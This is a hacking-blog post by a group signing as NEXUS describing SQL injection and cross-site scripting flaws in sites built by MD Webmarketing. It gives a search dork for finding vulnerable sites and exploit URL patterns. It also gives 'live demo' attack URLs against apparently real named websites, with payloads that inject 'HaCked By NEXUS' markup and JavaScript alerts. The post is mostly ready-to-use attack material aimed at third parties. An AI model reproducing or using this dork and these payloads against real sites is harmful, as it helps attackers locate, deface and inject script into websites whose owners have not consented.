• Home
  • Posts RSS
  • Comments RSS
  • E-Books
  • News
  • Pentesting
  • Scripts
  • Tutorials
  • Videos
  • Wallpapers

MD Webmarketing Cross Site Scripting / SQL Injection

by Malik korrich ~ vendredi 4 juillet 2014 Libellés : Cross Site Scripting , MD , NEXUS , SQLi , Webmarketing , Xss
Dork:
"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=

Exploits:
http://www.site-web.com/***.php?id= [SQL Injection]
http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

Live Demo:

SQL Injection:
http://www.pierreadrileiloes.com.br/exibe.php?id=61712%27



XSS (with HTML scripts):
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Ch1%3EHaCked%20By%20NEXUS%20!%3C/h1%3E


XSS (with JavaScript):
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cimg%20src=x%20onerror=alert%28%22NEXUS%22%29;%3E 


NEXUS - Sharing Is Caring

0 commentaires :

Enregistrer un commentaire

Article plus récent » « Article plus ancien

ads

Category

  • Android
  • Antivirus
  • Apple Devices
  • E-Books
  • Facebook tips
  • Games
  • MOBILE HACKING
  • News
  • Pentesting
  • Scripts
  • Softwares
  • Spam
  • TIPS AND TRICKS
  • Tricks
  • Tutorials
  • Videos
  • WINDOWS 7
  • Wallpapers
  • Windows 8 tips
  • Windows XP

Follow us

Articles
Atom
Articles
Commentaires
Atom
Commentaires

Total Pageviews

Sparkline
Flag Counter
| Powered by BackTrack Team | All rights reserved |
top